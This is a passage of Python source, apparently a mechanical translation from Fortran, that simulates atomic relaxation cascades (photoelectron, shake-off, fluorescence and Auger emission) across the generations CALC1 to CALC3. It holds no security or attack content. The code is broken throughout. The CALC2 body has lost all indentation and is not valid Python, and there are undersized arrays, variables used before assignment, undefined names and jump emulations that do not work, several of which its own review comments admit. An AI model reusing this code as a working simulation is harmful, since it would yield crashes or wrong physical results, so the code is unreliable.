    global INIOCC#(6,3,17)
    global ISHLMX#(6,3)
    global AMZ#[6,3]
    #COMMON/UPD/
    global NOCC#(6,3,17)
    global AUGR#(6,3,17,17,17)
    global RADR#(6,3,17,17)
    #COMMON/CALCAS/
    global IONSUM0#(10)
    global IFLSUM0#(10)
    global ESTORE0#(10,28)
    global EPHOTON0#(10,28)
    global DRXE0#(10,28)
    global DRYE0#(10,28)
    global DRZE0#(10,28)
    global DRX0#(10,28)
    global DRY0#(10,28)
    global DRZ0#(10,28)
    #COMMON/CALCAS1/
    global IONSUM#(10)
    global IFLSUM#(10)
    global ESTORE#(10,28)
    global EPHOTON#(10,28)
    global DRXE#(10,28)
    global DRYE#(10,28)
    global DRZE#(10,28)
    global DRX#(10,28)
    global DRY#(10,28)
    global DRZ#[10,28]
    #DIMENSION
    # NOTE(review): unlike CALC, these scratch arrays are sized 17/289
    # without the +1, yet 1-based indices up to TEMP[17]/TEMP1[289] are
    # used below -- a likely off-by-one versus CALC's 17+1/289+1; confirm.
    TEMP=[0 for x in range(17)]
    TEMP1=[0 for x in range(289)]
    #
    # CALCULATE CASCADE IN GAS KGAS AND MOLECULAR COMPONENT LGAS
    # WITH INTIAL ENERGY DEPOSIT ELECEN AND SHELL VACANCY CREATED AT ISHELL
    #
    # Continue from the counters of the previous generation.
    ISTART=IONSUM[int(NVAC)]
    ISTARTF=IFLSUM[int(NVAC)]
    API=numpy.arccos(-1.00)
    TWOPI=2.00*API
    def GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
        # Emulates Fortran label 100: initialise this generation's state
        # and photoelectron, then enter the GOTO4 cascade loop.
        ELEFT=ELECEN
        INIT=1
        # SET STARTING ARRAY NOCC EQUAL TO INIOCC
        for I in range(1,17+1):
            NOCC[int(KGAS)][int(LGAS)][I]=INIOCC[int(KGAS)][int(LGAS)][I]
        IONSUM[int(NVAC)]=ISTART+1
        IFLSUM[int(NVAC)]=ISTARTF
        # STORE PHOTOELECTRON ENERGY AND ANGLE
        ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ELECEN-ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]
        ELECN=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]
        ELEFT=ELEFT-ELECN
        NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]-1
        # USE PHOTELECTRON ANGULAR DISTRIBUTION
        APE=AA[ISHELL]
        BPE=BB[ISHELL]
        ANGGEN(APE,BPE,THET)
        if(THET < 0.0):
            THET=THET+API
        R3=random.uniform(0.0,1.0)
        PHI=TWOPI*R3
        DRCOS(DRX0[int(NVAC)][L1],DRY0[int(NVAC)][L1],DRZ0[int(NVAC)][L1],THET,PHI,DRXX,DRYY,DRZZ)
        DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRXX
        DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRYY
        DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRZZ
        # LOOP AROUND CASCADE
        def GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
            # Emulates Fortran label 4: handle shakeoff, then fluorescence
            # (GOTO2) and the Auger branch (counter116 loop).
            # CHECK FOR ELECTRON SHAKEOFF
            IDUM=1
            if(INIT > 1):
                ELECN=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]
            INSUM=IONSUM[int(NVAC)]
            globals().update(locals())
            # NOTE(review): unlike CALC, SHAKE's return value is discarded
            # here; JVAC is presumably picked up via module globals -- confirm.
            SHAKE(ISHELL,ELECN,KGAS,LGAS,ESHK,IDUM,INSUM,JVAC)
            # CALCULATE ENERGY OF ELECTRON
            if(JVAC == 0):
                pass
            else:
                # ELECTRON + SHAKEOFF
                ELECN=ELECN-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
                ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ELECN
                IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
                # MAXIMUM ION CHARGE STATE =28
                if(IONSUM[int(NVAC)]> 28) :
                    print(' 1ST GEN LIMITED TO 28 IN THIS VERSION IONSUM=',IONSUM[int(NVAC)])
                    sys.exit()
                # endif
                ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ESHK
                # NOTE(review): IZ[KGAS,LGAS] uses a comma subscript, unlike
                # the IZ[...][...] chains elsewhere; only valid for numpy.
                ELEFT=ELEFT-ESHK-ELEV[JVAC][IZ[KGAS,LGAS]]
                if(ELEFT < 0.0):
                    globals().update(locals())
                    complete=GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
                    return 1
                # RANDOM EMISSION DIRECTION
                R3=random.uniform(0.0,1.0)
                THET=numpy.arccos(1.0-2.0*R3)
                R4=random.uniform(0.0,1.0)
                PHI=TWOPI*R4
                DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
                DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
                DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
            def GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
                # Emulates Fortran label 2: choose and apply one
                # fluorescence transition, recursing until exhausted.
                UPDATE(KGAS,LGAS,ISHELL)
                INIT=2
                # CHOOSE FLUORESCENCE OR AUGER TRANSITION
                TSUM=0.0
                for I in range(1,17+1):
                    TSUM=TSUM+RADR[int(KGAS)][int(LGAS)][ISHELL][I]
                    for J in range(1,17+1):
                        TSUM=TSUM+AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]
                # NO MORE TRANSITIONS POSSIBLE
                if(TSUM == 0.0):
                    return
                # NORMALISE TO 1.0
                for I in range(1,17+1):
                    RADR[int(KGAS)][int(LGAS)][ISHELL][I]=RADR[int(KGAS)][int(LGAS)][ISHELL][I]/TSUM
                    for J in range(1,17+1):
                        AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]/TSUM
                # CREATE CUMULATIVE SUM ARRAY
                TEMP[1]=RADR[int(KGAS)][int(LGAS)][ISHELL][1]
                for I in range(2,17+1):
                    TEMP[I]=RADR[int(KGAS)][int(LGAS)][ISHELL][I]+TEMP[I-1]
                TEMP1[1]=AUGR[int(KGAS)][int(LGAS)][ISHELL][1][1]
                for I in range(2,17+1):
                    TEMP1[I]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][1]+TEMP1[I-1]
                for J in range(1,16+1):
                    for I in range(1,17+1):
                        TEMP1[I+(J*17)]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J+1]+TEMP1[I+(J*17)-1]
                # FIND FLUORESCENCE OR AUGER TRANSITION
                R1=random.uniform(0.0,1.0)
                for I in range(1,17+1):
                    if(R1 < TEMP[I]) :
                        # STORE PHOTON ENERGY AND ANGLE : UPDATE NOCC
                        IFLSUM[int(NVAC)]=IFLSUM[int(NVAC)]+1
                        EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]-ELEV[I][IZ[int(KGAS)][int(LGAS)]]
                        ELEFT=ELEFT-EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]
                        if(ELEFT < 0.0):
                            globals().update(locals())
                            complete=GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
                            return complete
                        # RANDOM EMISSION DIRECTION
                        R3=random.uniform(0.0,1.0)
                        THET=numpy.arccos(1.0-2.0*R3)
                        R4=random.uniform(0.0,1.0)
                        PHI=TWOPI*R4
                        DRX[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.cos(PHI)
                        DRY[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.sin(PHI)
                        DRZ[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.cos(THET)
                        NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]+1
                        NOCC[int(KGAS)][int(LGAS)][I]=NOCC[int(KGAS)][int(LGAS)][I]-1
                        # FIND LOWEST VACANCY
                        globals().update(locals())
                        VACANCY(KGAS,LGAS,ISHELL,ILAST)
                        if(ILAST == 1):
                            # NO MORE TRANSITIONS POSSIBLE
                            return
                        # endif
                        globals().update(locals())
                        GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
                        globals().update(locals())
                        return 1
                # endif
            GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
            # counter116/counter117 emulate Fortran labels 116/117.
            counter116=1
            while(counter116):
                counter116=0
                R2=R1-TEMP[17]
                for J in range(1,17+1):
                    if(counter116):
                        break
                    for I in range(1,17+1):
                        if(R2 < TEMP1[I+((J-1)*17)]) :
                            # AUGER OR COSTER KRONIG
                            # STORE EJECTED ELECTRON AND UPDATE NOCC
                            ETEMP=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]-(ELEV[I][IZ[int(KGAS)][int(LGAS)]]+ELEV[I][IZ[int(KGAS)][int(LGAS)]+1])*0.5-(ELEV[J][IZ[int(KGAS)][int(LGAS)]]+ELEV[J][IZ[int(KGAS)][int(LGAS)]+1])*0.5
                            if(ETEMP < 0.0):
                                # DO NOT ALLOW NEGATIVE ENERGY TRANSITIONS
                                counter117=1
                                while(counter117):
                                    counter117=0
                                    R1=random.uniform(0.0,1.0)
                                    if(R1 < TEMP[17]):
                                        counter117=1
                                counter116=1
                                break
                            # endif
                            IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
                            if(IONSUM[int(NVAC)]> 28) :
                                print(' 2ND GEN IONS LIMITED TO 28 IN THIS VERSION IONSUM=',IONSUM[int(NVAC)]) #34602
                                sys.exit()
                            # endif
                            ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ETEMP
                            ELEFT=ELEFT-ETEMP
                            if(ELEFT < 0.0):
                                globals().update(locals())
                                complete=GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
                                return complete
                            # RANDOM EMISSION DIRECTION
                            R3=random.uniform(0.0,1.0)
                            THET=numpy.arccos(1.0-2.0*R3)
                            R4=random.uniform(0.0,1.0)
                            PHI=TWOPI*R4
                            DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
                            DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
                            DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
                            NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]+1
                            NOCC[int(KGAS)][int(LGAS)][I]=NOCC[int(KGAS)][int(LGAS)][I]-1
                            NOCC[int(KGAS)][int(LGAS)][J]=NOCC[int(KGAS)][int(LGAS)][J]-1
                            # FIND LOWEST VACANCY
                            globals().update(locals())
                            VACANCY(KGAS,LGAS,ISHELL,ILAST)
                            if(ILAST == 1):
                                # NO MORE TRANSITIONS POSSIBLE
                                return
                            # endif
                            globals().update(locals())
                            GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
            # endif
        globals().update(locals())
        GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
    # NOTE(review): ICON is not a parameter of CALC1; this call relies on a
    # module-global ICON set by an earlier CALC call -- confirm.
    globals().update(locals())
    GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
    print(' ERROR IN CASCADE 1')
    sys.exit()
    # end
def CALC2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,L1):
# IMPLICIT #real*8(A-H,O-Z)
# IMPLICIT #integer*8(I-N)
# SCR=""
# SCR1=""
#COMMON/GENCAS/
global ELEV#[17,79]
global NSDEG#(17)
global AA#[17]
global BB#[17]
global SCR,SCR1
#COMMON/MIXC/
global PRSH#(6,3,17,17)
global ESH#(6,3,17)
global AUG#(6,3,17,17,17)
global RAD#[6,3,17,17]
global PRSHBT#(6,3,17)
global IZ#[6,3]
global INIOCC#(6,3,17)
global ISHLMX#(6,3)
global AMZ#[6,3]
#COMMON/UPD/
global NOCC#(6,3,17)
global AUGR#(6,3,17,17,17)
global RADR#(6,3,17,17)
#COMMON/CALCAS/
global IONSUM0#(10)
global IFLSUM0#(10)
global ESTORE0#(10,28)
global EPHOTON0#(10,28)
global DRXE0#(10,28)
global DRYE0#(10,28)
global DRZE0#(10,28)
global DRX0#(10,28)
global DRY0#(10,28)
global DRZ0#(10,28)
#COMMON/CALCAS1/
global IONSUM#(10)
global IFLSUM#(10)
global ESTORE#(10,28)
global EPHOTON#(10,28)
global DRXE#(10,28)
global DRYE#(10,28)
global DRZE#(10,28)
global DRX#(10,28)
global DRY#(10,28)
global DRZ#[10,28]
#DIMENSION
TEMP=[0 for x in range(17)]
TEMP1=[0 for x in range(289)]
#
# CALCULATE CASCADE IN GAS KGAS AND MOLECULAR COMPONENT LGAS
# WITH INTIAL ENERGY DEPOSIT ELECEN AND SHELL VACANCY CREATED AT ISHELL
#
ISTART=IONSUM[int(NVAC)]
ISTARTF=IFLSUM[int(NVAC)]
API=numpy.arccos(-1.00)
TWOPI=2.00*API
def GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
ELEFT=ELECEN
INIT=1
# SET STARTING ARRAY NOCC EQUAL TO INIOCC
for I in range(1,17+1):
NOCC[int(KGAS)][int(LGAS)][I]=INIOCC[int(KGAS)][int(LGAS)][I]
IONSUM[int(NVAC)]=ISTART+1
IFLSUM[int(NVAC)]=ISTARTF
# STORE INITIAL PHOTELECTRON AND ANGLE
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ELECEN-ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]
ELECN=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]
ELEFT=ELEFT-ELECN
NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]-1
# USE PHOTOELECTRON ANGULAR DISTRIBUTION
APE=AA[ISHELL]
BPE=BB[ISHELL]
ANGGEN(APE,BPE,THET)
if(THET < 0.0):
THET=THET+API
R3=random.uniform(0.0,1.0)
PHI=TWOPI*R3
DRCOS(DRX0[int(NVAC)][L1],DRY0[int(NVAC)][L1],DRZ0[int(NVAC)][L1],THET,PHI,DRXX,DRYY,DRZZ)
DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRXX
DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRYY
DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRZZ
# LOOP AROUND CASCADE
def GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
# CHECK FOR ELECTRON SHAKEOFF
IDUM=1
if(INIT > 1):
ELECN=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]
INSUM=IONSUM[int(NVAC)]
SHAKE(ISHELL,ELECN,KGAS,LGAS,ESHK,IDUM,INSUM,JVAC)
# CALCULATE ENERGY OF ELECTRON
if(JVAC == 0):
pass
else:
# ELECTRON + SHAKEOFF
ELECN=ELECN-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ELECN
IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
# MAXIMUM ION CHARGE STATE =28
if(IONSUM[int(NVAC)]> 28) :
print(' 2ND GEN IONS LIMITED TO 28 IN THIS VERSION IONSUM=',IONSUM[int(NVAC)])
sys.exit()
# endif
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ESHK
ELEFT=ELEFT-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
if(ELEFT < 0.0):
GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# RANDOM EMISSION DIRECTION
R3=random.uniform(0.0,1.0)
THET=numpy.arccos(1.0-2.0*R3)
R4=random.uniform(0.0,1.0)
PHI=TWOPI*R4
DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
def GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
    """Emulated Fortran label 2: pick and apply one fluorescence or
    Auger/Coster-Kronig transition for the current vacancy, recursing
    until no further transitions are possible.

    FIX: the loop flag line read bare ``counter116`` (a NameError at
    runtime); it must be ``counter116=1`` as in the CALC3/CALC4/CALC5
    copies of this routine.

    NOTE(review): machine-translated from Fortran. ILAST is an
    out-parameter of VACANCY in the original and is used before
    assignment here; the duplicated GOTO2/GOTO4 calls emulate Fortran
    jumps and do not transfer control -- verify against the source.
    """
    UPDATE(KGAS,LGAS,ISHELL)
    INIT=2
    # CHOOSE FLUORESCENCE OR AUGER TRANSITION
    TSUM=0.0
    for I in range(1,17+1):
        TSUM=TSUM+RADR[int(KGAS)][int(LGAS)][ISHELL][I]
        for J in range(1,17+1):
            TSUM=TSUM+AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]
    # NO MORE TRANSITIONS POSSIBLE
    if(TSUM == 0.0):
        return
    # NORMALISE TO 1.0
    for I in range(1,17+1):
        RADR[int(KGAS)][int(LGAS)][ISHELL][I]=RADR[int(KGAS)][int(LGAS)][ISHELL][I]/TSUM
        for J in range(1,17+1):
            AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][J]/TSUM
    # CREATE CUMULATIVE SUM ARRAY (TEMP: radiative, TEMP1: Auger)
    TEMP[1]=RADR[int(KGAS)][int(LGAS)][ISHELL][1]
    for I in range(2,17+1):
        TEMP[I]=RADR[int(KGAS)][int(LGAS)][ISHELL][I]+TEMP[I-1]
    TEMP1[1]=AUGR[int(KGAS)][int(LGAS)][ISHELL][1][1]
    for I in range(2,17+1):
        TEMP1[I]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][1]+TEMP1[I-1]
    for J in range(1,16+1):
        for I in range(1,17+1):
            TEMP1[I+(J*17)]=AUGR[int(KGAS)][int(LGAS)][ISHELL][I][(J+1)]+TEMP1[I+(J*17)-1]
    # FIND FLUORESCENCE OR AUGER TRANSITION
    R1=random.uniform(0.0,1.0)
    for I in range(1,17+1):
        if(R1 < TEMP[I]) :
            # STORE PHOTON ENERGY AND UPDATE NOCC
            IFLSUM[int(NVAC)]=IFLSUM[int(NVAC)]+1
            EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]-ELEV[I][IZ[int(KGAS)][int(LGAS)]]
            if(EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]] < 0.0):
                print(' EPHOTON=','%.3f' % EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]],' NVAC=',NVAC,' IN CALC2')
            ELEFT=ELEFT-EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]
            if(ELEFT < 0.0):
                GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
            # RANDOM EMISSION DIRECTION (isotropic)
            R3=random.uniform(0.0,1.0)
            THET=numpy.arccos(1.0-2.0*R3)
            R4=random.uniform(0.0,1.0)
            PHI=TWOPI*R4
            DRX[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.cos(PHI)
            DRY[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.sin(PHI)
            DRZ[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.cos(THET)
            NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]+1
            NOCC[int(KGAS)][int(LGAS)][I]=NOCC[int(KGAS)][int(LGAS)][I]-1
            # FIND LOWEST VACANCY
            VACANCY(KGAS,LGAS,ISHELL,ILAST)
            if(ILAST == 1):
                # NO MORE TRANSITIONS POSSIBLE
                return
            # endif
            GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
            # endif -- duplicated emulated jump kept from the translation
            GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
    # AUGER BRANCH: R1 fell beyond the radiative cumulative sum.
    counter116=1
    while(counter116):
        counter116=0
        R2=R1-TEMP[17]
        for J in range(1,17+1):
            if(counter116):
                break
            for I in range(1,17+1):
                if(R2 < TEMP1[I+((J-1)*17)]) :
                    # AUGER OR COSTER KRONIG
                    # STORE EJECTED ELECTRON AND UPDATE NOCC
                    ETEMP=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]-(ELEV[I][IZ[int(KGAS)][int(LGAS)]]+ELEV[I][IZ[int(KGAS)][int(LGAS)]+1])*0.5-(ELEV[J][IZ[int(KGAS)][int(LGAS)]]+ELEV[J][IZ[int(KGAS)][int(LGAS)]+1])*0.5
                    if(ETEMP < 0.0):
                        # DO NOT ALLOW NEGATIVE ENERGY TRANSITIONS:
                        # redraw R1 until it selects the Auger range,
                        # then restart the selection (Fortran label 34598).
                        counter117=1
                        while(counter117):
                            counter117=0
                            R1=random.uniform(0.0,1.0)
                            if(R1 < TEMP[17]):
                                counter117=1
                        counter116=1 #34598
                        break
                    # endif
                    IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
                    if(IONSUM[int(NVAC)]> 28) :
                        print(' 2ND GEN IONS LIMITED TO 28 IN THIS VERSION IONSUM=',IONSUM[int(NVAC)])
                        sys.exit()
                    # endif
                    ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ETEMP
                    ELEFT=ELEFT-ETEMP
                    if(ELEFT < 0.0):
                        GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
                    # RANDOM EMISSION DIRECTION (isotropic)
                    R3=random.uniform(0.0,1.0)
                    THET=numpy.arccos(1.0-2.0*R3)
                    R4=random.uniform(0.0,1.0)
                    PHI=TWOPI*R4
                    DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
                    DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
                    DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
                    NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]+1
                    NOCC[int(KGAS)][int(LGAS)][I]=NOCC[int(KGAS)][int(LGAS)][I]-1
                    NOCC[int(KGAS)][int(LGAS)][J]=NOCC[int(KGAS)][int(LGAS)][J]-1
                    # FIND LOWEST VACANCY
                    VACANCY(KGAS,LGAS,ISHELL,ILAST)
                    if(ILAST == 1):
                        # NO MORE TRANSITIONS POSSIBLE
                        return
                    # endif
                    GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
                    # endif -- duplicated emulated jump kept from the translation
                    GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# Start the cascade, then report the unreachable-state error (Fortran
# fall-through past the cascade loop).
# NOTE(review): IPN and ICON are not defined in this scope (they are
# parameters of the emulated-label helpers only) -- verify against the
# Fortran original.
GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
print(' ERROR IN CASCADE 2')
sys.exit()
# end
def CALC3(NVAC,KGAS,LGAS,ELECEN,ISHELL,L1):
    """Simulate the third-generation atomic de-excitation cascade for gas
    KGAS, molecular component LGAS, with initial energy deposit ELECEN
    and an initial vacancy in shell ISHELL.  NVAC indexes the vacancy
    being processed; L1 selects the parent direction in DRX0/DRY0/DRZ0.

    Results accumulate in the CALCAS3 globals (IONSUM, IFLSUM, ESTORE,
    EPHOTON, DRX*/DRY*/DRZ*).  Returns nothing.

    FIX: TEMP1 is indexed up to I+(J*17) = 17+16*17 = 289 below, so it
    needs 290 slots (it was allocated with 289, raising IndexError).

    NOTE(review): mechanical Fortran translation.  The emulated jumps
    (GOTO100/GOTO2/GOTO4 calls) do not transfer control like the
    original GOTOs; THET/DRXX/ESHK/JVAC/ILAST were Fortran
    out-parameters and are used before assignment; IPN/ICON are
    undefined at the top-level call.  Verify against the Fortran source.
    """
    #COMMON/GENCAS/
    global ELEV#[17,79]
    global NSDEG#[17]
    global AA#[17]
    global BB#[17]
    global SCR,SCR1
    #COMMON/MIXC/
    global PRSH#(6,3,17,17)
    global ESH#(6,3,17)
    global AUG#(6,3,17,17,17)
    global RAD#[6,3,17,17]
    global PRSHBT#(6,3,17)
    global IZ#[6,3]
    global INIOCC#(6,3,17)
    global ISHLMX#(6,3)
    global AMZ#[6,3]
    #COMMON/UPD/
    global NOCC#(6,3,17)
    global AUGR#(6,3,17,17,17)
    global RADR#(6,3,17,17)
    #COMMON/CALCAS2/ -- previous-generation results
    global IONSUM0#(10)
    global IFLSUM0#(10)
    global ESTORE0#(10,28)
    global EPHOTON0#(10,28)
    global DRXE0#(10,28)
    global DRYE0#(10,28)
    global DRZE0#(10,28)
    global DRX0#(10,28)
    global DRY0#(10,28)
    global DRZ0#(10,28)
    #COMMON/CALCAS3/ -- this generation's results
    global IONSUM#(10)
    global IFLSUM#(10)
    global ESTORE#(10,28)
    global EPHOTON#(10,28)
    global DRXE#(10,28)
    global DRYE#(10,28)
    global DRZE#(10,28)
    global DRX#(10,28)
    global DRY#(10,28)
    global DRZ#[10,28]
    # Fortran 1-based scratch arrays; element [0] unused.
    TEMP=[0 for x in range(18)]
    TEMP1=[0 for x in range(290)]
    #
    # CALCULATE CASCADE IN GAS KGAS AND MOLECULAR COMPONENT LGAS
    # WITH INTIAL ENERGY DEPOSIT ELECEN AND SHELL VACANCY CREATED AT ISHELL
    #
    ISTART=IONSUM[int(NVAC)]
    ISTARTF=IFLSUM[int(NVAC)]
    API=numpy.arccos(-1.00)   # pi
    TWOPI=2.00*API
    def GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
        # (Re)start the cascade: reset occupancies, store photoelectron.
        ELEFT=ELECEN
        INIT=1
        # SET STARTING ARRAY NOCC EQUAL TO INIOCC
        for I in range(1,17+1):
            NOCC[int(KGAS)][int(LGAS)][I]=INIOCC[int(KGAS)][int(LGAS)][I]
        IONSUM[int(NVAC)]=ISTART+1
        IFLSUM[int(NVAC)]=ISTARTF
        # STORE PHOTOELECTRON ENERGY AND ANGLE
        ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ELECEN-ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]
        ELECN=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]
        ELEFT=ELEFT-ELECN
        NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]-1
        # USE PHOTOELECTRON ANGULAR DISTRIBUTION
        APE=AA[ISHELL]
        BPE=BB[ISHELL]
        ANGGEN(APE,BPE,THET)
        if(THET < 0.0):
            THET=THET+API
        R3=random.uniform(0.0,1.0)
        PHI=TWOPI*R3
        DRCOS(DRX0[int(NVAC)][L1],DRY0[int(NVAC)][L1],DRZ0[int(NVAC)][L1],THET,PHI,DRXX,DRYY,DRZZ)
        DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRXX
        DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRYY
        DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=DRZZ
    # LOOP AROUND CASCADE
    def GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
        # CHECK FOR ELECTRON SHAKEOFF
        IDUM=1
        if(INIT > 1):
            ELECN=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]
        INSUM=IONSUM[int(NVAC)]
        SHAKE(ISHELL,ELECN,KGAS,LGAS,ESHK,IDUM,INSUM,JVAC)
        # CALCULATE ENERGY OF ELECTRON
        if(JVAC == 0):
            GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
        # ELECTRON + SHAKEOFF
        ELECN=ELECN-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
        ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ELECN
        IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
        # MAXIMUM ION CHARGE STATE =28
        if(IONSUM[int(NVAC)]> 28) :
            print(' 3RD GEN ION CHARGE LIMITED TO 28 IONSUM=',IONSUM[int(NVAC)])
            sys.exit()
        # endif
        ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ESHK
        ELEFT=ELEFT-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
        if(ELEFT < 0.0):
            GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
        # RANDOM EMISSION ANGLE (isotropic)
        R3=random.uniform(0.0,1.0)
        THET=numpy.arccos(1.0-2.0*R3)
        R4=random.uniform(0.0,1.0)
        PHI=TWOPI*R4
        DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
        DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
        DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
    def GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
